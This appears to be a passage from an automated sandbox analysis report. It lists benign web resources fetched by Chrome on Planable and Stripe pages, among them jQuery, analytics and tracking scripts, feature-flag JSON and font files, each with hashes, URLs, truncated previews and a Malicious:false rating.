                                                                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/ga/rul?tid=G-HR91C4PWHQ&gacid=875158720.1736508220&gtm=45je5190v9136106956z8867624896za200zb867624896&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=1328312842
                                                                                                                                                                              Preview:<html></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):30341
                                                                                                                                                                              Entropy (8bit):5.2603638127305805
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AC9027AAC7EF1965591126C162DD1768
                                                                                                                                                                              SHA1:66C0E93C8A41CF27091863F24BC22E18E58B2AB3
                                                                                                                                                                              SHA-256:D2832D341C2A46A0D98EC8BC56A03E181532A8D7751DD4D49E8FBD6F6C6AE14D
                                                                                                                                                                              SHA-512:A6AC62FE6E17EA89CAAB8F073C2E01F18380BD9A6DB8E5FEBB04365A06BDC3A2262C705B619002CE09EAA7A1760EF8BA59497A597D87D162545C6DC834F6DFA5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://sdk.split.io/api/splitChanges?since=-1
                                                                                                                                                                              Preview:{"till":1734099088586,"since":-1,"splits":[{"changeNumber":1734099088586,"trafficTypeName":"company","name":"campaigns","trafficAllocation":100,"trafficAllocationSeed":814866354,"seed":-1724477265,"status":"ACTIVE","killed":false,"defaultTreatment":"off","algo":2,"conditions":[{"conditionType":"WHITELIST","matcherGroup":{"combiner":"AND","matchers":[{"keySelector":null,"matcherType":"WHITELIST","negate":false,"userDefinedSegmentMatcherData":null,"whitelistMatcherData":{"whitelist":["2B9Du5tepkZaHwdkZ","2sm6ezB64bGcxnm3N","2smp7ivbNHDWcaFum","33uwmkYZtunA9XBmq","34ngoFaJadjB8quBT","3AbN46sGionNCA3Aw","3Dc9qWwBRvaGwR3Zg","3JpcKEEEisoT2eRXt","3pgTNWiQYxpTvjzA6","47A4Q86NXWhM8r8W4","4HzLbags6Cpuzyqid","4MgBgvBzDnMzoSSsu","4WwNm35dpobqXQw3r","56AKJx8ayPJ593fSa","5XY3YjZcXhwryRKeP","5dX4insp9JvijsfYd","5oyfAt95xBa6KmLJW","5uaCthe9EadgvWgis","6WqcK4ed4XwoE3ZLk","6qRCbpnr78n9wP5xX","7HBzsdLDhRC9ouAGK","7SeCAcByuasH6wo3Q","7wTZDzGX8q7nbXdPj","8HTdMyXDjpWC4qgSQ","8TMfPwhhWX53Mnref","8omTMuNWBkrq
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5426), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5426
                                                                                                                                                                              Entropy (8bit):5.271165756929169
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4050B7F2106D3693D62497155108E557
                                                                                                                                                                              SHA1:B41A6D199FE7F7D93D1714AA71FBFA34120FC01A
                                                                                                                                                                              SHA-256:1C9C5272136C7EBB6DF65A9F5F7E30AFE147971EC8D417412E7E5CBC3C51B77C
                                                                                                                                                                              SHA-512:4302D83963C399CB6FDDB47B40743B401DFF8F4282B23BA8DB6A922B0AA90BB874D14C2070F262A011298FCC1BD5D13D707C56A319515D901E650A6F0987FEFD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.firstpromoter.com/fprom.js
                                                                                                                                                                              Preview:function fprom_obj_(){($this=this).data={};var l=this.data,n="https://t.firstpromoter.com/track/signup",i="https://t.firstpromoter.com/track/sale",o="https://t.firstpromoter.com/track/new",a="_fprom_track",t="_fprom_subscribe",f="_fprom_code",c="_fprom_signup",s="_fprom_sale",d=86400,p=void 0;function r(e,n){l.cid=e,l.domain=n,l.tid=O(a),l.subscribed=O(t),l.ref_id=O(f),l.signed_up=O(c),l.referrer=document.referrer,l.url_ref_id=function(){var e=function(e){if(0<=e.indexOf("#_offer_")||0<=e.indexOf("#_r_")){var n=e.substring(e.indexOf("#_")+1,e.length);return n}return null}(h());e||(als=m(h(),"fp_ref"),als||(als=m(h(),"fpr")),als||(als=m(h(),"via")),als||(als=m(h(),"deal")),als||(als=m(h(),"_from")),als||(als=m(h(),"_by")),als||(als=m(h(),"_get")),als||(als=m(h(),"_go")),als&&(e="_r_"+als));return e}(),l.url_ref_id&&l.ref_id==l.url_ref_id&&function(e){y(e,"",-1)}(c),l.url=h(),function(){var e=window._fprom||window._fprom||[];if(e.loaded)return!1;for(var n=0;n<e.length;n++)l[e[n][0]]=e[n]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (7785)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2058707
                                                                                                                                                                              Entropy (8bit):5.179812812142811
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2543E5FB670AB5AAF5F4970C2F2E8DE3
                                                                                                                                                                              SHA1:C1B6EA5298E33798026D0ED33BAB57591A9F33FD
                                                                                                                                                                              SHA-256:83F0A16785B052FFBE9AFD15A7812AA9CFE145A47A674C614418E36A90C50C21
                                                                                                                                                                              SHA-512:79F600C216C11BF9175875D94F7E87A6EB9F6DAE617296FAFA7279E27DC9CCD73FE6DCF9D040458FD01706661D8D19053F56536F8347C1B19CCEE9F49F101149
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:<!DOCTYPE html>.<html. class="MktRoot". lang="en-US". data-js-controller="Page". data-page-id="Home". data-page-title="Stripe | Financial Infrastructure to Grow Your Revenue". data-loading.>. <head>. <script>window.__capturedErrors = [];.window.onerror = function (message, url, line, column, error) { __capturedErrors.push(error); };.window.onunhandledrejection = function(evt) { __capturedErrors.push(evt.reason); }.</script>.<meta. name="sentry-config". data-js-dsn="https://7cd38b0eb2b348b39a6002cc768f91c7@errors.stripe.com/376". data-js-release="ed321cc6f16e66ccc6a64c14f6fa5758aadcabce". data-js-environment="production". data-js-project="mkt".>.. <meta name="experiment-treatments" content="acquisition_top_cta_change.control.ursula.a7b52ae9-d419-40aa-906e-2a771db77ef1.a,wpp_homepage_title_copy.control.ursula.002dbd49-bd63-4b8c-8256-d473dd43bc53.a,acquisition_jp_homepage_holdback.control.ursula.a1f51be2-7c2b-46c7-ac51-39ea1d232d2b.a,acquisition_text_suserng_with_viewpor
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                              Entropy (8bit):4.342370993177109
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F3F40592C7FCB0E293CCAF5D7F39CDE
                                                                                                                                                                              SHA1:136C3E820DE242290E8C7B4F92C077923939221F
                                                                                                                                                                              SHA-256:E56E8B6876F8CB4DD4415CEAC45312795BFE9F081265F1EC2810722F8EF37EE3
                                                                                                                                                                              SHA-512:B842A5C0036267627E748470343A8D7DC6D627158EC9414600BC5574AA3E23A674B4578D1EE379C4CD7EE32D8DB2BB9EE1A0B74DBC3CB9AF5EFEE01758023848
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://sdk.split.io/api/splitChanges?since=1734099088586
                                                                                                                                                                              Preview:{"till":1734099088586,"since":1734099088586,"splits":[]}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):111922
                                                                                                                                                                              Entropy (8bit):5.541708163198936
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:682BCBC9A90572422D647D8E2D54A351
                                                                                                                                                                              SHA1:42C7D6E1D7F045F0BE7AEC0D37CE34480F4D7121
                                                                                                                                                                              SHA-256:1C297C6761FEC6B13686969ED403B35D2F646ADBA99329D709D349EE7E330CC5
                                                                                                                                                                              SHA-512:3E036FF71369E9B900750E76C113972A008EFDA5A44AC046934BE19218F265C499EB7D7EF497892C01D2560374652AD9535B1241D3C31E2CBBFFCF0EB496B400
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://app.satismeter.com/js
                                                                                                                                                                              Preview:(function(){"use strict";var ye=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function sn(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function hr(e){if(e.__esModule)return e;var n=e.default;if(typeof n=="function"){var t=function r(){return this instanceof r?Reflect.construct(n,arguments,this.constructor):n.apply(this,arguments)};t.prototype=n.prototype}else t={};return Object.defineProperty(t,"__esModule",{value:!0}),Object.keys(e).forEach(function(r){var i=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,i.get?i:{enumerable:!0,get:function(){return e[r]}})}),t}var An={exports:{}},an=An.exports=function(e){e||(e={}),typeof e=="string"&&(e={cookie:e}),e.cookie===void 0&&(e.cookie="");var n={};return n.get=function(t){for(var r=e.cookie.split(/;\s*/),i=0;i<r.length;i++){var o=r[i].split("="),s=unescape(o[0]);if(s===t)return unescape(o[1])}},n.set=function(t,r,i){i||(i=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 76028, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):76028
                                                                                                                                                                              Entropy (8bit):7.997044458941224
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3BC2988145E53F99D7CA469D8263C5CC
                                                                                                                                                                              SHA1:ABD43D121277BA1AFE079FC10BFE63F4532885E4
                                                                                                                                                                              SHA-256:BEA1A2F3763B8C2DE130299D0BE6D47B9F0C08E95294DEF35BBD1FBE8C8BE228
                                                                                                                                                                              SHA-512:A972D51B12379B5A570B1265FBA6CAB2C12E77E600A9D179BCA5B72717EB636814FC374FFA626DAF84772AF963EC23973E453577C93301B0CB796D03EE0AF849
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/kranky/v28/hESw6XVgJzlPsFn8oR2F.woff2
                                                                                                                                                                              Preview:wOF2......(........(..(..........................`..x....a.....8..9..`..6.$..\.... ..h..g..[..rA.}.D.;...U$.B..(.V.8*..............K..5...H...R......Lt"....m.Y.3LV%.-Z.....s...N. .....%....LE......,....+....t+:Mo..^F..e..pr4..;n).H.#h..[......e..x...^.N..X..\^..".q.#Y9.W~..U.k=I.3$Y..t .N...$..M[.....'....X..t..gt..3:Yq..P8.iC...}wI[.q.7m..MY.??OS._s..;3......:bc..eJZI.9i,C.......P..o_R~.t....]....#..94.^A8a.b....9efh..s..J.3.....F..(..Fc.n0}kH...S...d7.JM..l...U..@w..<...=....^.R..J.......&..QD..YF..C...I...W.H..7.fF.m.Q....5.Jf$.r.".....B..l......R1..m..lBrg.iW!e........+=e.J..:..S.....]...lG....$..7.cV.......X[...aj/...{......c.]....D.:..3.s.m.v.....C...h.k.h.s......~ ..1......^...J.._.../RRd.@.@........eR.J?4xY.6..n...{s..iUz.*.........C...=8/.b...OL..{.\.|..45..Tm..tV*.......!........f.d..N.7U....h..5..<.v..........9......m....T.....r.+.&...Wi..+.d5fCk.,..q.m..y.....*^D|"..,NfVQ.*4...#...?{...V.6..pdQ.8....3.}.....S.]..~.....OGI.....~..6.U.....#.p.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 24200, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):24200
                                                                                                                                                                              Entropy (8bit):7.991578794448236
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CE59F5F8298320580C2C940116A56E09
                                                                                                                                                                              SHA1:13A34FBBE8659189E7972333339C529B4BC720A4
                                                                                                                                                                              SHA-256:25B4E1AB4784C3965E700CBFE7C6997DF000A0CE3375220A1FA7A9E291399C41
                                                                                                                                                                              SHA-512:89208FF6AA789B70EAF6BFA48D52B527CAF2E07865A8504BCE40505768C7EEC0C90492006C8211FD6966360B540706D7748B5EC6DE6B2C27E14C46CC064854B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/kavoon/v23/pxiFyp4_scRYhlUIM7D7.woff2
                                                                                                                                                                              Preview:wOF2......^........d..^'............................4..f.`..|.H..S.....d..k..d..6.$..". .............m.......:2.l..b.....`...o.... E....f.Ef;+....Q*U.B.......h-...f...H.Tr....}....#.M..1.&..8.'...Ha..N.@....gEd.x6.#q&...g`....%....gv...)...$..A...XDG*,..E.....(E.D.T@...AQ..Z...D.....9W.e.p........k..3q.2..]T....}/\..S........P.T..Z...QP..lS..5Y..7...a...1...G9...zi.....{.@..Z.=.\..b..S|%..7...3@.UN...o..Pg%%.}.Y;..@'i.......;..:.Ab.........e......U.V.[.....~......K.....bVid.].yR?]+qMfE|....kE...l..q....E...S.t.pq...r... ..lS.sM.?....."...`..x..X.\UuSy.D. gq.#...y..6...R..A4..V..1..}......Y.>@....Qv.c,..V....h.(.......A..H..)p#.A"..\{@R.#%.....C.27...].p!wW.......6.u{...8.B.T(R..~..?..$+m.r].....vq....9..?.b........n.5.@..O/U ..,..-....%61.<G...5@.o..;.]..A.......4..iO.r..H...gR..\..m..V....Y.!..I&Py.h..L.'..6 .z....r.3 ..1|.K../.X.....W....U... s.......ku(..o]>J.p..fNa^\....?8...&...#.l...h.....{.w.+t>..q.]..<...a...;.....Z(..F..b..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                              Entropy (8bit):3.3787834934861767
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7564D564E3A845CB2E8D9EF016D9C283
                                                                                                                                                                              SHA1:F8135C720F4B6C2AFD04E2347CE07671528CC27B
                                                                                                                                                                              SHA-256:333FD7C8C969E0491398D55C8FFC06A08FB6822EAFF1AD5C561350A4C8C10BDD
                                                                                                                                                                              SHA-512:90F63E9E6814DDD97A5D4FF252E4FAF067B8A653126DDF6C01DDC9CAADDE7FF6EDB869191A1B7F54E12D4AE7B5EFE44AC605025C069D6CEE19ED308FADA62B1D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"Missing auth"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77
                                                                                                                                                                              Entropy (8bit):4.138132932345106
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F29576539BC15D96E23DD0FC6DB3A1E0
                                                                                                                                                                              SHA1:883B610AF0FC17A7A79A14BD9F8939A425D0A285
                                                                                                                                                                              SHA-256:AD2931845915C2606DC55418D5D939944EC6C82EF832DB09E8C0C26EB05979FC
                                                                                                                                                                              SHA-512:C2908493311991BEBA7C1D98F23F4343032555F4498E6037CFB10EFA1DE7C37129859ACE9F8E992C883DD3BBA237B9161775A4C586485B55F64AC36627BEA535
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"page":{"name":"Planable","url":"https://status.planable.io","status":"UP"}}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):187842
                                                                                                                                                                              Entropy (8bit):5.458814897958196
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9D218A92CA29560EC99D6FBBA65F44D6
                                                                                                                                                                              SHA1:63F262EB31A6062757FB417A039729D4850AD3E5
                                                                                                                                                                              SHA-256:543A5970D69E4351BBDC07E1F787F947FADCF7125B6305DDBE870EE76B17C30A
                                                                                                                                                                              SHA-512:AF5424D5EC44E1AE9E392E236448B9B3A48A951E644C4C40D30BDAAAAAAFB93747F94D52013547A1DBA67DB31FB5AA7FBBFA0DA54619EC75A48E4BF2F0A9FFCE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/actions/tiktok-pixel/cd7d14bb4dc70ff30f2f.js
                                                                                                                                                                              Preview:(()=>{var e,t,r={7948:e=>{"use strict";const{AbortController:t,AbortSignal:r}="undefined"!=typeof self?self:"undefined"!=typeof window?window:void 0;e.exports=t,e.exports.AbortSignal=r,e.exports.default=t},1291:(e,t,r)=>{"use strict";const n=r(6150),o=r(6086);class s extends Error{constructor(e){if(!Array.isArray(e))throw new TypeError("Expected input to be an Array, got "+typeof e);let t=(e=[...e].map((e=>e instanceof Error?e:null!==e&&"object"==typeof e?Object.assign(new Error(e.message),e):new Error(e)))).map((e=>"string"==typeof e.stack?o(e.stack).replace(/\s+at .*aggregate-error\/index.js:\d+:\d+\)?/g,""):String(e))).join("\n");t="\n"+n(t,4),super(t),this.name="AggregateError",Object.defineProperty(this,"_errors",{value:e})}*[Symbol.iterator](){for(const e of this._errors)yield e}}e.exports=s},6086:(e,t,r)=>{"use strict";const n=r(1209),o=/\s+at.*(?:\(|\s)(.*)\)?/,s=/^(?:(?:(?:node|(?:internal\/[\w/]*|.*node_modules\/(?:babel-polyfill|pirates)\/.*)?\w+)\.js:\d+:\d+)|native)/,a=voi
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):305349
                                                                                                                                                                              Entropy (8bit):5.562419365893085
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2F4002659326E8D8EB2981680BA56496
                                                                                                                                                                              SHA1:0F2257E17774FD4931DA18EE8C26D91E4EB59C71
                                                                                                                                                                              SHA-256:3D16D951E2E73A7E6CBD5F4C3E01E7E18B5585FF123F9D1C1CF5471FFE3E865C
                                                                                                                                                                              SHA-512:C5D41786C2296163B6B1659B7583D1D2D567FBCD2D52E6527B7878BA5E3B5BE5858477DB0B9E2DB66682F39F3841C368CF6058713970EAC19B48AFC0D91218DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=AW-805904039
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":17,"vtp_instanceDestinationId":"AW-805904039","tag_id":11},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18792, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18792
                                                                                                                                                                              Entropy (8bit):7.988318493447156
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:74795056A2358804684C7E9D0479F484
                                                                                                                                                                              SHA1:7030F4F33183B8DE843E82EEDB9CB6A6CDD107C3
                                                                                                                                                                              SHA-256:1C9C85D0B73B7321EB8ED22E0B6BCD577478DD5F99D1379A5D4CEA10884033AC
                                                                                                                                                                              SHA-512:0716739470EC0E3CE8A2AF369AD76DB7EE61AB7E3EFB4B342B2F2AEAC2CCEA47E875E4F8EC057683B3F0D21847C4A9B30F93BA5ABF961CC4CAA985CD764DD4C1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw5aXo.woff2
                                                                                                                                                                              Preview:wOF2......Ih..........H...........................:......$.`?STATH..L.|........,.......6.$.... ..~..3..(.a...M'......2.z#...-...H.......S..1x...4].!2--}V. ..W.VX......~.f-z.......>)2P.j..RyM..s}.ewU...u.v.. ....n{\;.Ah2t...8.........F^.A._..{"_.x...]B.$....W..q.......E`..G....=..=I...._....y..5p.T)......Y...!..L..N.Ji)...&}.l....$...B..4i.....K..k..i?.R..?..k...^...6.f"..p|Y..P.kE)P......=b*.@!.Y..:+$....FcQ:....4.5.6.....:..$...).9.3r.M...[U..u.g...Eu..V.b.l.LF..$$. ...fi......q...).83....16.|.. S.(S.........s.....$.....&..H.......:.k...2T....I..LP..00....r..J...^q....c.d.[ A<...I.k.pY5...:.............T.~.{u.wg.!..s...^...9q....0u..).nc..g..72.\*Q.O@...7.2......3....v.v........3....ot...D......]C..;.F5.:v.1..9v.....8..3...&.u...eJB.F.....LIz.*H.*.bU.P.T......h....r...$)....;....<B...QV..i.../.....rffj....8......2L3...P5..l.U.b...`.d.9.:..R.w.*.G.o.}.R..H."!.. ADJ..z .w.....k={..zY..z...e,..SL.:`......."....0.....l.!..(I.T..j......*...9.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                              Entropy (8bit):5.26155068129537
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2B7A69347998A3186BD9420FF4900183
                                                                                                                                                                              SHA1:E93672C8303E668BDB452D03F1D06E46BFA2C789
                                                                                                                                                                              SHA-256:34A00C8BD00DCC9EC9107A79C7FB6540600DEE447EBAA818B1CABA476FEFD35B
                                                                                                                                                                              SHA-512:35E9105C895C4A7830BD595155DB85D62EA330AC1F9879F51AA49C0125B9B07030F57C04F582E5E4A6999D3C73DDD94A320707F69350C811D890D9EDE4644D0E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.planable.io/wau.php
                                                                                                                                                                              Preview:<script>window.top.postMessage (JSON.stringify({ "uuid": "3a9c10ba-e325-42b5-bb68-69698af3ac36" }), "*");</script>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (930), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                              Entropy (8bit):5.118473677411452
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F5EADDB4DFC7E121ABA2112E1CA3EF2D
                                                                                                                                                                              SHA1:4C8617E748F288236BA239FE3EB2EE39DA929AA1
                                                                                                                                                                              SHA-256:34A85E78B5402C253C2BC4CF64426C2B6B18601602E8A9A71568139FB3EE6599
                                                                                                                                                                              SHA-512:A05791E2B1CEE4945B41F4504EC83DD846995AE70EC9A1882D650A745B13AE8389A8A423ECA56372C216D20029CED76FC76E841CEAE0E1A0B8BB9FD8F364769A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://m.stripe.network/inner.html
                                                                                                                                                                              Preview:<!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.44.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=false/.test(e)||(e=(e=e.match(/version=(4|6)/))?e[1]:"4",window.StripeM.p({t:!0,v:e})),e=function(e){if(window.opener||window.parent||window)try{var i=((t=JSON.parse(e.data)).message||t).action,t=t.message?t.message.payload:t;switch(i){case"ping":window.StripeM.p({t:!0,o:{muid:t.muid,sid:t.sid,referrer:t.referrer,url:t.url,title:t.title,v2:t.v2},v:t.version||"4"});break;case"track":if(!t.source||!t.data)return;window.StripeM.b({muid:t.muid,sid:t.sid,url:t.url,source:t.source,data:t.data},t.version||"4")}}catch(e){}},window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onMessage",e))},document.body.appendChild(e)}()</script></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                              Entropy (8bit):2.8731406795131336
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7ACE9F77ED96D3A9B673DAAB479FDB49
                                                                                                                                                                              SHA1:57998C9959F3552B61568B1FA74BED2F716D5375
                                                                                                                                                                              SHA-256:CAFA6AE784BAC3A17690AEE2583405605288A10F70BB2C1D5936B711CE52C883
                                                                                                                                                                              SHA-512:DB4C4084A2A4F00C18FEC1696DD6F061142B143EDA3497E7A21530D49E5EEA3A9FFEFF066CE188C8FC73C1B8D8EF91B9B39C4A1D737DADC8644D2F12F12E7B97
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
